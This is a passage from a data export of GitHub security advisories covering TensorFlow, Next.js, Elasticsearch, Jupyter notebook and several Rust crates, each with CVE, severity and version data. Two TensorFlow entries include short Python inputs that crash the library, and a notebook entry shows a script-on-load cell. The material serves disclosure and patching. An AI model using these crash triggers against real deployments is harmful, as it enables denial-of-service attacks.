[{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-19709'}, {'type': 'WEB', 'url': 'https://github.com/liufee/feehicms/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/liufee/feehicms'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-27T12:52:23Z', 'nvd_published_at': '2021-08-26T03:15:00Z'}" +1.4.0,GHSA-5pg8-h4gv-m3p8,2021-08-19T17:22:27Z,2021-08-25T20:53:56Z,,['CVE-2021-28306'],Null pointer deference in fltk,An issue was discovered in the fltk crate before 0.15.3 for Rust. There is a NULL pointer dereference during attempted use of a multi label type if the image is nonexistent.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'fltk'}, 'ecosystem_specific': {'affected_functions': ['fltk::prelude::WidgetExt::set_label_type']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.15.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28306'}, {'type': 'WEB', 'url': 'https://github.com/MoAlyousef/fltk-rs/issues/519'}, {'type': 'PACKAGE', 'url': 'https://github.com/MoAlyousef/fltk-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0038.html'}]","{'cwe_ids': ['CWE-476'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:22:27Z', 'nvd_published_at': None}" +1.4.0,GHSA-ch3r-vp46-8g22,2021-08-31T21:00:31Z,2021-08-09T20:39:52Z,,['CVE-2020-17952'],Code injection in topthink/think,A remote code execution (RCE) vulnerability in /library/think/App.php of Twothink v2.0 allows attackers to execute arbitrary PHP code.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'topthink/think'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '6.0.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-17952'}, {'type': 'WEB', 'url': 'https://github.com/twothink/twothink/issues/1'}, {'type': 'PACKAGE', 'url': 'https://github.com/twothink/twothink'}]","{'cwe_ids': ['CWE-74'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-02T21:43:12Z', 'nvd_published_at': '2021-07-26T20:15:00Z'}" +1.4.0,GHSA-cgfm-62j4-v4rf,2021-08-23T16:57:40Z,2021-08-25T14:44:17Z,,['CVE-2021-37635'],Heap out of bounds access in sparse reduction operations,"### Impact +The implementation of sparse reduction operations in TensorFlow can trigger accesses outside of bounds of heap allocated data: + +```python +import tensorflow as tf + +x = tf.SparseTensor( + indices=[[773, 773, 773], [773, 773, 773]], + values=[1, 1], + dense_shape=[337, 337, 337]) +tf.sparse.reduce_sum(x, 1) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/a1bc56203f21a5a4995311825ffaba7a670d7747/tensorflow/core/kernels/sparse_reduce_op.cc#L217-L228) fails to validate that each reduction group does not overflow and that each corresponding index does not point to outside the bounds of the input tensor. + +### Patches +We have patched the issue in GitHub commit [87158f43f05f2720a374f3e6d22a7aaa3a33f750](https://github.com/tensorflow/tensorflow/commit/87158f43f05f2720a374f3e6d22a7aaa3a33f750). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-cgfm-62j4-v4rf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37635'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/87158f43f05f2720a374f3e6d22a7aaa3a33f750'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T16:57:40Z', 'nvd_published_at': '2021-08-12T21:15:00Z'}" +1.4.0,GHSA-4cww-f7w5-x525,2023-06-13T22:25:56Z,2021-08-25T20:46:13Z,,['CVE-2020-35857'],Stack consumption in trust-dns-server,"There's a stack overflow leading to a crash and potential DOS when processing additional records for return of MX or SRV record types from the server. This is only possible when a zone is configured with a null target for MX or SRV records. Prior to 0.16.0 the additional record processing was not supported by trust-dns-server. There Are no known issues with upgrading from 0.16 or 0.17 to 0.18.1. The remidy should be to upgrade to 0.18.1. If unable to do so, MX, SRV or other record types with a target to the null type, should be avoided.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'trust-dns-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.16.0'}, {'fixed': '0.18.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35857'}, {'type': 'WEB', 'url': 'https://github.com/bluejekyll/trust-dns/issues/980'}, {'type': 'PACKAGE', 'url': 'https://github.com/bluejekyll/trust-dns'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0001.html'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:20:03Z', 'nvd_published_at': None}" +1.4.0,GHSA-mm4m-qg48-f7wc,2022-06-14T20:12:33Z,2021-08-25T21:01:29Z,,['CVE-2020-13759'],Improper Synchronization and Race Condition in vm-memory,rust-vmm vm-memory before 0.1.1 and 0.2.x before 0.2.1 allows attackers to cause a denial of service (loss of IP networking) because read_obj and write_obj do not properly access memory. This affects aarch64 (with musl or glibc) and x86_64 (with musl).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'vm-memory'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.1'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'vm-memory'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.2.0'}, {'fixed': '0.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13759'}, {'type': 'WEB', 'url': 'https://github.com/rust-vmm/vm-memory/issues/93'}, {'type': 'PACKAGE', 'url': 'https://github.com/rust-vmm/vm-memory'}, {'type': 'WEB', 'url': 'https://github.com/rust-vmm/vm-memory/releases/tag/v0.1.1'}, {'type': 'WEB', 'url': 'https://github.com/rust-vmm/vm-memory/releases/tag/v0.2.1'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0157.html'}]","{'cwe_ids': ['CWE-362', 'CWE-662'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T20:45:48Z', 'nvd_published_at': '2020-06-02T19:15:00Z'}" +1.4.0,GHSA-f6px-w8rh-7r89,2023-09-15T17:59:24Z,2021-08-02T17:15:05Z,,['CVE-2019-16354'],Beego has a file creation race condition,The File Session Manager in Beego 1.10.0 allows local users to read session files because there is a race condition involving file creation within a directory with weak permissions.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/beego/beego'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.12.2'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/astaxie/beego'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.12.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-16354'}, {'type': 'WEB', 'url': 'https://github.com/astaxie/beego/issues/3763'}, {'type': 'WEB', 'url': 'https://github.com/beego/beego/issues/3763'}, {'type': 'WEB', 'url': 'https://github.com/beego/beego/pull/3975'}, {'type': 'WEB', 'url': 'https://github.com/beego/beego/pull/3975/commits/f99cbe0fa40936f2f8dd28e70620c559b6e5e2fd'}, {'type': 'WEB', 'url': 'https://github.com/astaxie/beego/commit/f99cbe0fa40936f2f8dd28e70620c559b6e5e2fd'}, {'type': 'WEB', 'url': 'https://github.com/beego/beego/commit/bac2b31afecc65d9a89f9e473b8006c5edc0c8d1'}, {'type': 'PACKAGE', 'url': 'https://github.com/astaxie/beego'}, {'type': 'WEB', 'url': 'https://github.com/astaxie/beego/blob/v1.12.2/session/sess_file.go#L142'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0084'}]","{'cwe_ids': ['CWE-362', 'CWE-732'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-22T21:51:41Z', 'nvd_published_at': '2019-09-16T15:15:00Z'}" +1.4.0,GHSA-3cgf-9m6x-pwwr,2021-08-19T21:08:22Z,2021-08-25T20:47:50Z,,['CVE-2020-35868'],Data races in rusqlite,An issue was discovered in the rusqlite crate before 0.23.0 for Rust. Memory safety can be violated via UnlockNotification.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'rusqlite'}, 'ecosystem_specific': {'affected_functions': ['rusqlite::Connection::get_aux', 'rusqlite::Connection::set_aux', 'rusqlite::session::Session::attach', 'rusqlite::session::Session::diff', 'rusqlite::trace::log', 'rusqlite::vtab::create_module']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.23.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35868'}, {'type': 'WEB', 'url': 'https://github.com/rusqlite/rusqlite/commit/45fd77ee43c38eea4d6f4e2e56c1667a55ec654f'}, {'type': 'PACKAGE', 'url': 'https://github.com/rusqlite/rusqlite'}, {'type': 'WEB', 'url': 'https://github.com/rusqlite/rusqlite/releases/tag/0.23.0'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0014.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:08:22Z', 'nvd_published_at': '2020-12-31T10:15:00Z'}" +1.4.0,GHSA-4x25-f45x-grv5,2021-08-10T16:54:25Z,2021-08-09T20:40:53Z,,['CVE-2021-33900'],Missing encryption in Apache Directory Studio,"While investigating DIRSTUDIO-1219 it was noticed that configured StartTLS encryption was not applied when any SASL authentication mechanism (DIGEST-MD5, GSSAPI) was used. While investigating DIRSTUDIO-1220 it was noticed that any configured SASL confidentiality layer was not applied. This issue affects Apache Directory Studio version 2.0.0.v20210213-M16 and prior versions.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.directory.studio:org.apache.directory.studio.parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0.v20210717-M17'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.0.0.v20210213-M16'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33900'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb1dbcc43a5b406e45d335343a1704f4233de613140a01929d102fdc9%40%3Cusers.directory.apache.org%3E'}]","{'cwe_ids': ['CWE-311', 'CWE-319'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-02T21:23:12Z', 'nvd_published_at': '2021-07-26T07:15:00Z'}" +1.4.0,GHSA-vxf5-wxwp-m7g9,2022-04-28T20:32:19Z,2021-08-12T14:51:14Z,,['CVE-2021-37699'],Open Redirect in Next.js,"Next.js is an open source website development framework to be used with the React library. In affected versions specially encoded paths could be used when `pages/_error.js` was statically generated, allowing an open redirect to occur to an external site. In general, this redirect does not directly harm users although it can allow for phishing attacks by redirecting to an attacker's domain from a trusted domain. + +### Impact + +- **Affected:** Users of Next.js between `10.0.5` and `10.2.0` +- **Affected:** Users of Next.js between `11.0.0` and `11.0.1` using `pages/_error.js` without `getInitialProps` +- **Affected:** Users of Next.js between `11.0.0` and `11.0.1` using `pages/_error.js` and `next export` +- **Not affected**: Deployments on Vercel ([vercel.com](https://vercel.com)) are not affected +- **Not affected:** Deployments **with** `pages/404.js` +- Note that versions prior to 0.9.9 package `next` npm package hosted a different utility (0.4.1 being the latest version of that codebase), and this advisory does not apply to those versions. + +We recommend upgrading to the latest version of Next.js to improve the overall security of your application. + +### Patches + +https://github.com/vercel/next.js/releases/tag/v11.1.0","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'next'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.9.9'}, {'fixed': '11.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vercel/next.js/security/advisories/GHSA-vxf5-wxwp-m7g9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37699'}, {'type': 'PACKAGE', 'url': 'https://github.com/vercel/next.js'}, {'type': 'WEB', 'url': 'https://github.com/vercel/next.js/releases/tag/v11.1.0'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-12T14:50:18Z', 'nvd_published_at': '2021-08-12T00:15:00Z'}" +1.4.0,GHSA-9cg2-2j2h-59v9,2023-06-13T16:47:45Z,2021-08-25T20:49:11Z,,['CVE-2020-35897'],Data races in atom,The atom crate contains a security issue revolving around its implementation of the Send trait. It incorrectly allows any arbitrary type to be sent across threads potentially leading to use-after-free issues through memory races.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'atom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35897'}, {'type': 'WEB', 'url': 'https://github.com/slide-rs/atom/issues/13'}, {'type': 'PACKAGE', 'url': 'https://github.com/slide-rs/atom'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0044.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T20:53:48Z', 'nvd_published_at': None}" +1.4.0,GHSA-phwj-86vx-cfjc,2021-07-09T01:55:01Z,2021-08-13T15:21:35Z,,['CVE-2021-33192'],Cross-site scripting in Apache Jena Fuseki,A vulnerability in the HTML pages of Apache Jena Fuseki allows an attacker to execute arbitrary javascript on certain page views. This issue affects Apache Jena Fuseki from version 2.0.0 to version 4.0.0 (inclusive).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.jena:jena-fuseki'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '4.1.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.0.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33192'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r684d8943d755a96fe90f8cd8df196737b6bde3f2b74e15a9bd479975%40%3Cusers.jena.apache.org%3E'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-06T15:42:15Z', 'nvd_published_at': '2021-07-05T10:15:00Z'}" +1.4.0,GHSA-hp4c-x6r7-6555,2021-08-23T17:57:14Z,2021-08-25T14:44:14Z,,['CVE-2021-37636'],Floating point exception in `SparseDenseCwiseDiv`,"### Impact +The implementation of `tf.raw_ops.SparseDenseCwiseDiv` is vulnerable to a division by 0 error: + +```python +import tensorflow as tf +import numpy as np + +tf.raw_ops.SparseDenseCwiseDiv( + sp_indices=np.array([[4]]), + sp_values=np.array([-400]), + sp_shape=np.array([647.]), + dense=np.array([0])) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/a1bc56203f21a5a4995311825ffaba7a670d7747/tensorflow/core/kernels/sparse_dense_binary_op_shared.cc#L56) uses a common class for all binary operations but fails to treat the division by 0 case separately. + +### Patches +We have patched the issue in GitHub commit [d9204be9f49520cdaaeb2541d1dc5187b23f31d9](https://github.com/tensorflow/tensorflow/commit/d9204be9f49520cdaaeb2541d1dc5187b23f31d9). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-hp4c-x6r7-6555'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37636'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/d9204be9f49520cdaaeb2541d1dc5187b23f31d9'}]","{'cwe_ids': ['CWE-369'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T17:57:14Z', 'nvd_published_at': '2021-08-12T18:15:00Z'}" +1.4.0,GHSA-fjr6-hm39-4cf9,2021-08-19T18:46:23Z,2021-08-25T20:52:50Z,,['CVE-2021-25906'],Double free in basic_dsp_matrix,"An issue was discovered in the basic_dsp_matrix crate before 0.9.2 for Rust. When a TransformContent panic occurs, a double drop can be performed.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'basic_dsp_matrix'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.9.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25906'}, {'type': 'WEB', 'url': 'https://github.com/liebharc/basic_dsp/issues/47'}, {'type': 'PACKAGE', 'url': 'https://github.com/liebharc/basic_dsp'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0009.html'}]","{'cwe_ids': ['CWE-415'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:46:23Z', 'nvd_published_at': None}" +1.4.0,GHSA-45p7-c959-rgcm,2021-08-02T21:57:02Z,2021-08-25T21:01:18Z,,[],Process crashes when the cell used as DepGroup is not alive,"### Impact + +It's easy to create a malign transaction which uses the dead cell as the DepGroup in the DepCells. The transaction can crash all the receiving nodes.",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'ckb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.40.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/nervosnetwork/ckb/security/advisories/GHSA-45p7-c959-rgcm'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0109.html'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-02T21:57:02Z', 'nvd_published_at': None}" +1.4.0,GHSA-3393-hvrj-w7v3,2021-08-02T19:21:25Z,2021-08-09T20:41:17Z,,['CVE-2021-22144'],Denial of Service in Elasticsearch,In Elasticsearch versions before 7.13.3 and 6.8.17 an uncontrolled recursion vulnerability that could lead to a denial of service attack was identified in the Elasticsearch Grok parser. A user with the ability to submit arbitrary queries to Elasticsearch could create a malicious Grok query that will crash the Elasticsearch node.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.elasticsearch:elasticsearch'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.8.17'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.elasticsearch:elasticsearch'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0-alpha1'}, {'fixed': '7.13.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22144'}, {'type': 'WEB', 'url': 'https://discuss.elastic.co/t/elasticsearch-7-13-3-and-6-8-17-security-update/278100'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210827-0006/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}]","{'cwe_ids': ['CWE-674'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-02T19:21:25Z', 'nvd_published_at': '2021-07-26T12:15:00Z'}" +1.4.0,GHSA-4xj5-vv9x-63jp,2021-08-19T18:56:22Z,2021-08-25T20:50:22Z,,['CVE-2020-35928'],Data races in concread,"An issue was discovered in the concread crate before 0.2.6 for Rust. Attackers can cause an ARCache data race by sending types that do not implement Send/Sync.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'concread'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35928'}, {'type': 'WEB', 'url': 'https://github.com/kanidm/concread/issues/48'}, {'type': 'PACKAGE', 'url': 'https://github.com/kanidm/concread'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0092.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:56:11Z', 'nvd_published_at': None}" +1.4.0,GHSA-cx4j-fxr7-jxg8,2023-06-13T18:09:24Z,2021-08-25T20:53:01Z,,['CVE-2021-25902'],Double free in glsl-layout,"Affected versions of this crate did not guard against panic within the user-provided function f (2nd parameter of fn map_array), and thus panic within f causes double drop of a single object. + +The flaw was corrected in the 0.4.0 release by wrapping the object vulnerable to a double drop within ManuallyDrop.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'glsl-layout'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25902'}, {'type': 'WEB', 'url': 'https://github.com/rustgd/glsl-layout/pull/10'}, {'type': 'PACKAGE', 'url': 'https://github.com/rustgd/glsl-layout'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0005.html'}]","{'cwe_ids': ['CWE-415'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:43:30Z', 'nvd_published_at': None}" +1.4.0,GHSA-hwvq-6gjx-j797,2022-01-18T23:01:35Z,2021-08-23T19:40:38Z,,['CVE-2021-32798'],Special Element Injection in notebook,"### Impact + +Untrusted notebook can execute code on load. This is a remote code execution, but requires user action to open a notebook. + +### Patches + +5.7.11, 6.4.1 + +### References + +[OWASP Page on Injection Prevention](https://cheatsheetseries.owasp.org/cheatsheets/Injection_Prevention_Cheat_Sheet.html#injection-prevention-rules) + +### For more information + +If you have any questions or comments about this advisory, or vulnerabilities to report, please email our security list security@ipython.org. + +Credit: Guillaume Jeanne from Google + + +### Example: + +A notebook with the following content in a cell and it would display an alert when opened for the first time in Notebook (in an untrusted state): + +``` +{ ""cell_type"": ""code"", ""execution_count"": 0, ""metadata"": {}, ""outputs"": [ { ""data"": { ""text/html"": [ ""\n""], ""text/plain"": [] }, ""metadata"": {}, ""output_type"": ""display_data"" } ], ""source"": [ """" ] } +````","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'notebook'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.7.11'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'notebook'}, 'ranges': [{'type': 